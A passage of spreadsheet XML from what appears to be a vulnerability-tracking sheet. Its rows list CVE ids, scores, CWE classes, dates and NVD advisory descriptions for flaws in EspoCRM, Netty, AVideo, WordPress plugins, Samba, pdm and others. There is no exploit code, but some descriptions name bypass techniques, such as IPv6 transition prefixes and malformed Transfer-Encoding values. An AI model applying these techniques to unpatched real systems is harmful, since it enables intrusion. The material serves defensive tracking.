          <t>EspoCRM before 10.0.4 is vulnerable to server-side request forgery. HostCheck::ipAddressIsNotInternal(), which validates outbound URLs to block requests to internal/private IP addresses, strips ::ffff: (IPv4-mapped IPv6) prefixes but does not recognize IPv6 transition addresses that embed private IPv4 addresses: NAT64 (64:ff9b::), 6to4 (2002::), and Teredo (2001:0000::). An attacker who controls a domain with AAAA records pointing to such transition addresses can bypass both the internal-host validation and the CURLOPT_RESOLVE IP-pinning check, causing EspoCRM to issue outbound requests to internal network services. Affected paths include POST /Attachment/fromImageUrl, reachable by any authenticated user with attachment access, and outbound webhook delivery, which requires an admin or API user.</t>
        </is>
      </c>
      <c r="M3696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88896</t>
        </is>
      </c>
    </row>
    <row r="3697">
      <c r="A3697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88940</t>
        </is>
      </c>
      <c r="C3697" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3697" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3697" s="5" t="inlineStr"/>
      <c r="F3697" s="5" t="inlineStr"/>
      <c r="G3697" s="5" t="inlineStr"/>
      <c r="H3697" s="5" t="inlineStr"/>
      <c r="I3697" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3697" s="5" t="inlineStr"/>
      <c r="K3697" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3697" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 fails to validate the path query parameter in the workspace browse endpoint, allowing remote attackers to enumerate arbitrary directories on the host filesystem. Attackers can traverse the directory structure to locate project directories and identify targets for further exploitation.</t>
        </is>
      </c>
      <c r="M3697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88940</t>
        </is>
      </c>
    </row>
    <row r="3698">
      <c r="A3698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89044</t>
        </is>
      </c>
      <c r="C3698" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3698" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3698" s="5" t="inlineStr"/>
      <c r="F3698" s="5" t="inlineStr"/>
      <c r="G3698" s="5" t="inlineStr"/>
      <c r="H3698" s="5" t="inlineStr"/>
      <c r="I3698" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3698" s="5" t="inlineStr"/>
      <c r="K3698" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L3698" s="5" t="inlineStr">
        <is>
          <t>Netty versions 4.1.133.Final through 4.1.137.Final and 4.2.13.Final through 4.2.17.Final fail to properly validate the final transfer coding in the Transfer-Encoding header, allowing attackers to smuggle requests by using malformed encoding declarations. Attackers can split Transfer-Encoding headers across multiple lines or use values like 'chunked, xchunked' to bypass validation and decode messages as chunked when the final coding is not chunked, enabling request smuggling attacks.</t>
        </is>
      </c>
      <c r="M3698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89044</t>
        </is>
      </c>
    </row>
    <row r="3699">
      <c r="A3699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89173</t>
        </is>
      </c>
      <c r="C3699" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3699" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3699" s="5" t="inlineStr"/>
      <c r="F3699" s="5" t="inlineStr"/>
      <c r="G3699" s="5" t="inlineStr"/>
      <c r="H3699" s="5" t="inlineStr"/>
      <c r="I3699" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3699" s="5" t="inlineStr"/>
      <c r="K3699" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L3699" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Sensitive Data Exposure vulnerability. Unauthenticated remote attackers can enumerate valid user accounts by exploiting differences in system responses.</t>
        </is>
      </c>
      <c r="M3699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89173</t>
        </is>
      </c>
    </row>
    <row r="3700">
      <c r="A3700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89175</t>
        </is>
      </c>
      <c r="C3700" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3700" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3700" s="5" t="inlineStr"/>
      <c r="F3700" s="5" t="inlineStr"/>
      <c r="G3700" s="5" t="inlineStr"/>
      <c r="H3700" s="5" t="inlineStr"/>
      <c r="I3700" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3700" s="5" t="inlineStr"/>
      <c r="K3700" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="L3700" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Client-Side Authentication vulnerability. Unauthenticated remote attackers can bypass authentication to access specific pages and obtain partial system configuration values.</t>
        </is>
      </c>
      <c r="M3700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89175</t>
        </is>
      </c>
    </row>
    <row r="3701">
      <c r="A3701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89242</t>
        </is>
      </c>
      <c r="C3701" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3701" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3701" s="5" t="inlineStr"/>
      <c r="F3701" s="5" t="inlineStr"/>
      <c r="G3701" s="5" t="inlineStr"/>
      <c r="H3701" s="5" t="inlineStr"/>
      <c r="I3701" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3701" s="5" t="inlineStr"/>
      <c r="K3701" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3701" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a server-side request forgery vulnerability in the _json_decode function that fetches remote URLs and local file paths without SSRF validation. Unauthenticated attackers can POST file paths or HTTP URLs to login.json.php to read local files or access internal services, with results parsed as login credentials.</t>
        </is>
      </c>
      <c r="M3701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89242</t>
        </is>
      </c>
    </row>
    <row r="3702">
      <c r="A3702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89248</t>
        </is>
      </c>
      <c r="C3702" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3702" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3702" s="5" t="inlineStr"/>
      <c r="F3702" s="5" t="inlineStr"/>
      <c r="G3702" s="5" t="inlineStr"/>
      <c r="H3702" s="5" t="inlineStr"/>
      <c r="I3702" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3702" s="5" t="inlineStr"/>
      <c r="K3702" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3702" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 is missing an authentication/authorization check in plugin/WebRTC/status.json.php. When the WebRTC plugin is present, any unauthenticated remote user can request /plugin/WebRTC/status.json.php and receive JSON containing the absolute filesystem path of the WebRTC2RTMP helper binary (revealing the document-root path), the configured WebRTC port, file_exists/is_executable status for the binary, the contents of the WebRTC log/JSON files (videos/WebRTC2RTMP.log) when present, and whether the configured port is reachable on loopback (127.0.0.1) and on the public address. The endpoint performs no User::isLogged(), User::isAdmin(), or forbiddenPage() check. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="M3702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89248</t>
        </is>
      </c>
    </row>
    <row r="3703">
      <c r="A3703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3703" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37268</t>
        </is>
      </c>
      <c r="C3703" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3703" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3703" s="5" t="inlineStr"/>
      <c r="F3703" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3703" s="5" t="inlineStr"/>
      <c r="H3703" s="5" t="inlineStr"/>
      <c r="I3703" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3703" s="5" t="inlineStr"/>
      <c r="K3703" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="L3703" s="5" t="inlineStr">
        <is>
          <t>Print Assumptions does not report that a definition was produced while universe checking was disabled when that definition reaches the caller through Parameter Inline in a module type. Applying a functor inlines the body of the parameter, and the inlining drops the record that the term was built under Unset Universe Checking, so the resulting constant carries no trace of the unsafe operation. A module implementation can therefore prove False using a universe inconsistency, expose it through an inlined parameter, and have Print Assumptions report the dependent proof as closed under the global context. Because Print Assumptions is the in-process audit used to confirm that a development rests on no unexpected assumptions, a dependency built this way passes that audit while proving arbitrary propositions. The standalone checker coqchk does reject the resulting compiled file. The project records this in dev/doc/critical-bugs.md under non-fixed bugs and rates the risk as moderate when coqchk is not used.</t>
        </is>
      </c>
      <c r="M3703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37268</t>
        </is>
      </c>
    </row>
    <row r="3704">
      <c r="A3704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3704" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15647</t>
        </is>
      </c>
      <c r="C3704" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3704" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3704" s="5" t="inlineStr"/>
      <c r="F3704" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3704" s="5" t="inlineStr"/>
      <c r="H3704" s="5" t="inlineStr"/>
      <c r="I3704" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3704" s="5" t="inlineStr"/>
      <c r="K3704" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3704" s="5" t="inlineStr">
        <is>
          <t>CDT before 1.4.5 contains an out-of-bounds read vulnerability in the opposedVertexInd() function when constraint edge intersections are computed in floating point and round outside adjacent triangles. Attackers can supply nearly-degenerate constraint edges through geometry data to trigger an out-of-bounds array access that crashes the calling process.</t>
        </is>
      </c>
      <c r="M3704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15647</t>
        </is>
      </c>
    </row>
    <row r="3705">
      <c r="A3705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3705" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15690</t>
        </is>
      </c>
      <c r="C3705" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3705" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3705" s="5" t="inlineStr"/>
      <c r="F3705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3705" s="5" t="inlineStr"/>
      <c r="H3705" s="5" t="inlineStr"/>
      <c r="I3705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3705" s="5" t="inlineStr"/>
      <c r="K3705" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3705" s="5" t="inlineStr">
        <is>
          <t>The Content Mask WordPress plugin before 1.8.5.6 does not properly sanitise and escape content submitted with a post before outputting it in the pages it generates, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks against any user viewing or previewing the affected page.
The Content Mask WordPress plugin before 1.8.5.6's option to restrict its use by role does not prevent this.</t>
        </is>
      </c>
      <c r="M3705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15690</t>
        </is>
      </c>
    </row>
    <row r="3706">
      <c r="A3706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3706" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-46808</t>
        </is>
      </c>
      <c r="C3706" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3706" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3706" s="5" t="inlineStr"/>
      <c r="F3706" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3706" s="5" t="inlineStr"/>
      <c r="H3706" s="5" t="inlineStr"/>
      <c r="I3706" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3706" s="5" t="inlineStr"/>
      <c r="K3706" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L3706" s="5" t="inlineStr">
        <is>
          <t>An Insertion of Sensitive Information into Log File vulnerability in SUSE neuvector manager exposes sensitive information into the manager container’s log
This issue affects neuvector: before 5.4.5.</t>
        </is>
      </c>
      <c r="M3706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-46808</t>
        </is>
      </c>
    </row>
    <row r="3707">
      <c r="A3707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15927</t>
        </is>
      </c>
      <c r="C3707" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3707" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3707" s="5" t="inlineStr"/>
      <c r="F3707" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3707" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H3707" s="5" t="inlineStr"/>
      <c r="I3707" s="5" t="inlineStr">
        <is>
          <t>2026-07-21</t>
        </is>
      </c>
      <c r="J3707" s="5" t="inlineStr"/>
      <c r="K3707" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3707" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's repository-level mirror configuration
feature. The POST and PUT handlers in endpoints/api/mirror.py accept an
external_reference parameter without SSRF validation, unlike the
organization-level mirror handlers which apply validate_external_registry_url().
A repository administrator can supply a crafted hostname that causes the Quay
mirror worker to make requests via Skopeo to internal network services, cloud
metadata endpoints, or other resources not intended to be reachable from the
Quay application.</t>
        </is>
      </c>
      <c r="M3707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15927</t>
        </is>
      </c>
    </row>
    <row r="3708">
      <c r="A3708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18796</t>
        </is>
      </c>
      <c r="C3708" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3708" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3708" s="5" t="inlineStr"/>
      <c r="F3708" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3708" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H3708" s="5" t="inlineStr"/>
      <c r="I3708" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3708" s="5" t="inlineStr"/>
      <c r="K3708" s="5" t="inlineStr">
        <is>
          <t>CWE-1342</t>
        </is>
      </c>
      <c r="L3708" s="5" t="inlineStr">
        <is>
          <t>Any application that
     uses external QSPI flash for encrypted XIP on nRF5340 and relies on that
     encryption for confidentiality and/or integrity of the externally stored
     code. No specific nRF Connect SDK version is the root cause; the weakness
     is in the on-the-fly decryption scheme.</t>
        </is>
      </c>
      <c r="M3708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18796</t>
        </is>
      </c>
    </row>
    <row r="3709">
      <c r="A3709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19398</t>
        </is>
      </c>
      <c r="C3709" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3709" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3709" s="5" t="inlineStr"/>
      <c r="F3709" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3709" s="5" t="inlineStr"/>
      <c r="H3709" s="5" t="inlineStr"/>
      <c r="I3709" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3709" s="5" t="inlineStr"/>
      <c r="K3709" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3709" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write in the SmiFlash SMM module of ASUS FA507NU and FA507NV BIOS allows a local  administrator to cause a system crash (BSOD) or BIOS corruption via a crafted software SMI (SW SMI) request with an oversized length value.Refer to the ' 
Security Update for ASUS FA507NV / FA507NU BIOS   ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M3709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19398</t>
        </is>
      </c>
    </row>
    <row r="3710">
      <c r="A3710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21103</t>
        </is>
      </c>
      <c r="C3710" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3710" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3710" s="5" t="inlineStr"/>
      <c r="F3710" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3710" s="5" t="inlineStr"/>
      <c r="H3710" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I3710" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3710" s="5" t="inlineStr"/>
      <c r="K3710" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="L3710" s="5" t="inlineStr">
        <is>
          <t>Path traversal in GalaxyDiagnostics prior to SMR Sep-2026 Release 1 allows physical attackers to access files with system privilege.</t>
        </is>
      </c>
      <c r="M3710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21103</t>
        </is>
      </c>
    </row>
    <row r="3711">
      <c r="A3711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3012</t>
        </is>
      </c>
      <c r="C3711" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3711" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3711" s="5" t="inlineStr"/>
      <c r="F3711" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3711" s="5" t="inlineStr"/>
      <c r="H3711" s="5" t="inlineStr">
        <is>
          <t>redhat:enterprise_linux, redhat:openshift_container_platform, samba:samba</t>
        </is>
      </c>
      <c r="I3711" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J3711" s="5" t="inlineStr"/>
      <c r="K3711" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3711" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Samba’s certificate auto-enrollment Group Policy handling. When certificate auto-enrollment is enabled, Samba may retrieve a CA certificate over an unencrypted HTTP connection and install it into the local trust store without proper verification. An attacker with the ability to intercept or redirect network traffic could exploit this behavior to supply a malicious certificate authority certificate, potentially allowing interception or spoofing of trusted communications.</t>
        </is>
      </c>
      <c r="M3711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3012</t>
        </is>
      </c>
    </row>
    <row r="3712">
      <c r="A3712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32639</t>
        </is>
      </c>
      <c r="C3712" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3712" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3712" s="5" t="inlineStr"/>
      <c r="F3712" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3712" s="5" t="inlineStr"/>
      <c r="H3712" s="5" t="inlineStr"/>
      <c r="I3712" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3712" s="5" t="inlineStr"/>
      <c r="K3712" s="5" t="inlineStr">
        <is>
          <t>CWE-289</t>
        </is>
      </c>
      <c r="L3712" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, the CMS section's Theme Editor AJAX handlers did not enforce per-template-type permission checks, allowing a backend user with any single CMS permission to act on template types outside their authorized scope. The CMS controller gated access to the section as a whole using OR-logic across its five permissions, but individual handlers such as onSave(), onDelete(), and onDeleteTemplates() did not verify that the user held the specific permission for the requested template type, so a user with only cms.manage_pages could craft AJAX requests to delete layouts, modify partials, or read content files. Separately, the AssetList widget was registered for any user who passed the controller gate regardless of the cms.manage_assets permission, and its onUpload() handler omitted the theme-validation call present on the other mutating handlers, permitting unauthorized file uploads into the active theme's asset directory. Exploitation requires an authenticated backend account holding at least one of the CMS Theme Editor permissions. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M3712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32639</t>
        </is>
      </c>
    </row>
    <row r="3713">
      <c r="A3713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42808</t>
        </is>
      </c>
      <c r="C3713" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3713" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3713" s="5" t="inlineStr"/>
      <c r="F3713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3713" s="5" t="inlineStr"/>
      <c r="H3713" s="5" t="inlineStr"/>
      <c r="I3713" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3713" s="5" t="inlineStr"/>
      <c r="K3713" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L3713" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Bosch Sensortec COINES_SDK versions 2.0 through 2.11. 
The host streaming API function {{coines_read_stream_sensor_data()}} fails to validate the boundaries of the caller-provided destination buffer.
Internally, the stream processing mechanism in {{comm_intf_process_stream_response()}} discards the requested {{number_of_samples}} argument and copies the entirety of the streaming ring buffer's accumulated data into {{coines_stream_rsp_buf}}.
Subsequently, {{coines_read_stream_sensor_data()}} unconditionally executes a {{memcpy}} of the ring buffer size into the caller-provided buffer without verifying if the destination memory allocation is large enough.
A malicious or compromised hardware board connected via USB or BLE can exploit this by streaming a high volume of sensor samples, causing a heap or stack-based buffer overflow on the host desktop environment.
This can result in a Denial of Service (DoS) or potential arbitrary code execution on the host machine.</t>
        </is>
      </c>
      <c r="M3713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42808</t>
        </is>
      </c>
    </row>
    <row r="3714">
      <c r="A3714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47763</t>
        </is>
      </c>
      <c r="C3714" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3714" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3714" s="5" t="inlineStr"/>
      <c r="F3714" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3714" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3714" s="5" t="inlineStr"/>
      <c r="I3714" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3714" s="5" t="inlineStr"/>
      <c r="K3714" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L3714" s="5" t="inlineStr">
        <is>
          <t>pdm is a Python package and dependency manager supporting the latest PEP standards. In versions prior to 2.27.0, pdm writes several project-local state or configuration files without symlink protection. If a malicious repository places those files as symlinks, local PDM operations can overwrite the symlink targets. This creates an arbitrary file clobber primitive relative to the privileges of the invoking user. Config.__init__() resolves the project-local pdm.toml path and _save_config() writes to the resolved target. If PROJECT_ROOT/pdm.toml is a symlink to another file, pdm config -l ... updates the target file instead of refusing the write.
The same general problem exists for other project-local persistence paths that are written directly with no lstat / O_NOFOLLOW protection. For the pdm.toml PoC specifically, the target file must already contain parseable TOML. Otherwise the load step fails before the write path is reached. That parser constraint does not apply to the .pdm-python or .python-version sinks. This issue has been fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M3714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47763</t>
        </is>
      </c>
    </row>
    <row r="3715">
      <c r="A3715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49349</t>
        </is>
      </c>
      <c r="C3715" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3715" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3715" s="5" t="inlineStr"/>
      <c r="F3715" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3715" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3715" s="5" t="inlineStr"/>
      <c r="I3715" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3715" s="5" t="inlineStr"/>
      <c r="K3715" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3715" s="5" t="inlineStr">
        <is>
          <t>regclient is a Docker and OCI Registry Client in Go. Prior to version 0.11.5, credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs. Version 0.11.5 fixes the issue.</t>
        </is>
      </c>
      <c r="M3715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49349</t>
        </is>
      </c>
    </row>
    <row r="3716">
      <c r="A3716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50576</t>
        </is>
      </c>
      <c r="C3716" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D3716" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3716" s="5" t="inlineStr"/>
      <c r="F3716" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3716" s="5" t="inlineStr"/>
      <c r="H3716" s="5" t="inlineStr"/>
      <c r="I3716" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3716" s="5" t="inlineStr"/>
      <c r="K3716" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="L3716" s="5" t="inlineStr">
        <is>
